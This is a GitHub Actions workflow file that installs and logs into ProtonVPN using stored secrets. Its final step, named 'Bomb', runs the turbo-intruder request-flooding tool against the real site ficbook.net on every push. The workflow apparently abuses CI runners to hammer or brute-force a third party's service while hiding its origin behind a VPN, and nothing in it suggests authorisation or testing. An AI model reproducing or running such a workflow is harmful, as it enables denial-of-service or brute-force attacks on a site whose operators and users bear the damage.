# This is a basic workflow that is manually triggered

name: Manual workflow

# Controls when the action will run. Workflow runs when manually triggered using the UI
# or API.
on:
  workflow_dispatch:
  push:
  

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "greet"
  greet:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
    - name: Copy
      uses: actions/checkout@v3
    - name: Enable Vpn
      run: |
        wget -O pack.deb https://repo.protonvpn.com/debian/dists/stable/main/binary-all/protonvpn-stable-release_1.0.3_all.deb
        sudo apt-get update
        sudo apt-get install pack.deb
        sudo apt-get install protonvpn-cli
        protonvpn-cli login ${{ secrets.VL }}
        ${{ secrets.VP }}
    - name: Bomb
      run: java -jar turbo-intruder-all.jar beta/script_l.py beta/req.txt https://ficbook.net:433 foo
